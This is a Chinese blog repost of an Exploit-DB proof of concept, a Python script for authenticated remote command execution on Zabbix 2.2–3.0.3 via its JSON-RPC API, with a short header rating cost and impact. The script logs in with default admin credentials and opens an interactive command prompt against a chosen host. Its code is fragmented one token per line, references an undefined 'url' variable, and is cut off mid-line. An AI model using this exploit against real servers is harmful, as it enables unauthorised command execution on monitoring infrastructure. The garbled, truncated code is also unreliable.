from:http://0x007.blog.51cto.com/6330498/1839957
漏洞来源: https://www.exploit-db.com/exploits/39937/
攻击成本:高
危害程度:低(此洞需要密码)
利用条件: 需要高权限用户登录
影响范围:2.2 < 3.0.3
tips:
此洞需要你拿到高权限的账户密码,当你拿到账户密码之后,进入后台也可以执行命令,利用API JSON-RPC为第二种方案。
此exp并不是很完美,因为不会自动获取hostid。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
import
requests
import
json
import
readline
ZABIX_ROOT
=
'http://192.168.66.2'
### Zabbix IP-address
login
=
'Admin'
### Zabbix login 账户
password
=
'zabbix'
### Zabbix password 密码
hostid
=
'10084'
### Zabbix hostid 需要指定命令的主机
### auth
payload
=
{
"jsonrpc"
:
"2.0"
,
"method"
:
"user.login"
,
"params"
: {
'user'
: "
"+login+"
",
'password'
: "
"+password+"
",
},
"auth"
:
None
,
"id"
:
0
,
}
headers
=
{
'content-type'
:
'application/json'
,
}
auth
=
requests.post(url, data
=
json.dumps(payload), headers
=
(headers))
auth
=
auth.json()
while
True
:
cmd
=
raw_input
(
' 33[41m[zabbix_cmd]>>:
评论